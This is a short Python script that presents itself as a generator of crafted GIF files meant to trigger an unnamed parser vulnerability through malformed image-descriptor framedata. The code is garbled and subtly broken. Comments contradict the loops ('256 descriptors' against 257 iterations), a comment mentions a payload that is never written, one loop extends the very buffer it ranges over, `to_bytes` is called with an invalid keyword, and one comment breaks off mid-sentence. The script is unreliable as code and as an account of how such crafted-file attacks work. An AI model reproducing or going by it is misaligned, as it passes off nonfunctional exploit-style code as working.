#!/usr/bin/env python3

import struct
from typing import BinaryIO

# Generates a random GIF file into `out` using the
# given RNG as source of randomness. This is mainly here to show
# that the vulnerability can be triggered by a crafted
# framedata field in an image descriptor
def generate_random_gif(
        rng: BinaryIO, out: BinaryIO
    ):
    header = b'GIF89a'
    datalen = int.from_bytes(
            rng.read(3), byteorder='big')
    data = rng.read(datalen)

    # Write the header and all bytes preceding the first descriptor
    print('Writing the header', end='', flush=True)
    out.write(header + data[:10])
    print(' done.', flush=True)

    # Now we're going to write 256 descriptors at once
    # Using this loop means we avoid making multiple calls to read()
    for _ in range(257):
        # The label says 10 but there are actually two more
        # bytes after the length field
        framedata = b'\x2C\xF9\x04\x01'

        # We need to make sure to add \xFF when writing any
        # portion of framedata that may contain 0xFF. Otherwise
        # it could lead to an infinite loop of zero-es being written
        # Note that these writes will not affect the actual contents
        # of the image, which is less than ideal because they waste space.
        # On the other hand, disassembling the generated gif shows that
        # those spots in the framedata have no effect on the output. That's why
        # I'm doing it anyway.
        if framedata[2] == 1 or framedata[-1:]!= b'\xff':
            framedata += b'\x00'

        framedata += rng.read(7)


        # We fill up the rest with nulls except one place where we put our payload
        for i in range(framedata[-1]+1, len(framedata)):
            framedata += b'\x00'

        print('Writing a random descriptor', end='', flush=True)
        out.write(framedata)
        # For now we'll hardcode the number of loops to use, since we don't
    # yet know how much space remains between the final descriptor and EOF
    numloops = 0xC0

    paddinglen = (numloops * 3).to_bytes(size=2, byteorder='little')

    # Write the leftover bytes before the last descriptor
    print('Writing remaining bytes', end='', flush=True)
    out.seek(-1, 2)
    out.write(paddinglen)
    out.write(struct.pack('<B', numloops))
    out.flush()
